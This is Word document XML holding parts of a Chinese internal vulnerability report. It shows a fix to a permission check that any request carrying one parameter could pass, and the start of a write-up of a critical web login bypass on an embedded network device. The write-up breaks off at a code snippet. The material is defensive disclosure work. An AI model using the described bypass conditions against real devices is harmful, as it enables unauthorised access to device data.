          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在权限控制模块中修改逻辑判断，将原有的判断逻辑</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">if (null != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>httpRequest.getParameter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>BMECIDClosing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改为双逻辑判断，使用精确匹配方案：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If (null != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>httpRequest.getParameter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C351EF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>BMECIDClosing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C351EF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">")) &amp;&amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C351EF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>requestURI.</w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>equals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>business.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>若使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的模糊匹配，请使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pattern</w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>方式，描述为</w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/**/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>business.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4"/>
    <w:p w:rsidR="001E63E4" w:rsidRPr="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4"/>
    <w:p w:rsidR="00021104" w:rsidRDefault="00F15059" w:rsidP="00021104">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入型</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证鉴权被绕过</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1E0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1668"/>
        <w:gridCol w:w="3827"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1893"/>
      </w:tblGrid>
      <w:tr w:rsidR="00021104" w:rsidRPr="00B2254C" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00B2254C" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>产品</w:t>
            </w:r>
            <w:r w:rsidRPr="00164F65">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WEB</w:t>
            </w:r>
            <w:r w:rsidRPr="00164F65">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>页面登录权限校验漏洞技术分析报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00076B09" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全问题编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00076B09" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C729F" w:rsidRPr="00076B09" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001C729F" w:rsidRDefault="001C729F" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>严重级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6854" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001C729F" w:rsidRPr="001C729F" w:rsidRDefault="001C729F" w:rsidP="001C729F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C729F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>致命</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>产品简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00ED74D8" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00ED74D8" w:rsidRDefault="00021104" w:rsidP="00546FA0">
            <w:pPr>
              <w:ind w:firstLineChars="150" w:firstLine="315"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>某嵌入式网络盒子设备</w:t>
            </w:r>
            <w:r w:rsidRPr="00D43E52">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00C21020" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题所在模块功能、使用场景说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00D47B16" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="00D47B16" w:rsidRDefault="00021104" w:rsidP="00F8404F">
            <w:pPr>
              <w:ind w:firstLineChars="150" w:firstLine="315"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>该盒子提供了</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>WEB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>管理的功能</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>正常场景下需要正确的用户名和密码登陆系统之后才可以修改或者查询数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>但是由于系统登陆</w:t>
            </w:r>
            <w:r w:rsidR="00F8404F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的模块逻辑存在</w:t>
            </w:r>
            <w:r w:rsidR="00BC3F36">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>可以构造异常的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>报文绕过系统的认证</w:t>
            </w:r>
            <w:r w:rsidR="00AD6BE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidR="00F8404F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>鉴权</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>直接查看或者修改设备的数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB3E2F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="00DC57FC" w:rsidTr="00D4483F">
        <w:trPr>
          <w:trHeight w:val="4734"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003169AC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>代码片段</w:t>
            </w:r>
            <w:r w:rsidRPr="003169AC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pP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HW_UINT32 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_WEB_IsNoAuthPage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(const HW_CHAR8 *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
